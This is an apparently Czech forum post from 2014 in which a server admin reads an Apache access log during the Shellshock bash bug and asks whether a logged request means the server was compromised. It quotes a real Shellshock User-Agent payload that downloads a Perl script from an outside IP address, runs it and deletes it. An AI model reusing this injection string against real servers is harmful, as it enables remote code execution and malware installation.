a pokud mám podle logu apt, že byl bash verze 4.2+dfsg-0.1+deb7u1 instalován 2014-09-24 16:38:33, ale v logu Apache mám záznam s HTTP kódem 200 ze dne 2014-09-27 00:33:55, tak to mám chápat jak?
/var/www/0ops/log/access.log:70.42.149.68 - - [27/Sep/2014:00:33:55 +0200] "GET / HTTP/1.0" 200 643 "-" "() { :;}; /bin/bash -c "wget -O /var/tmp/wow1 198.49.76.152/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1""
...tady hlavně nepředpokládám, že webserver handloval request na "/" spuštěním shellu. A výraz v posledním fieldu je podle mě User-Agent, takže bych z toho nanejvýš (pokud vůbec) soudil, že request přišel z hacknutého stroje.
Taky mám v logu něco podobného, na neupgradnutém stroji, a dokud šlo jen o requesty na "/" a ne na existující, natož spustitelné test.sh apod. (takové nemám, nejsem blázen), chci doufat, že můžu být klidný. Jinak by podle mě šlo především o díru ve webserveru, pokud by cokoliv založené na stringu, který poslal klient jako User-Agent, podstrkával shellu. A o té bychom jistě už také věděli, v této vzrušené době...
E.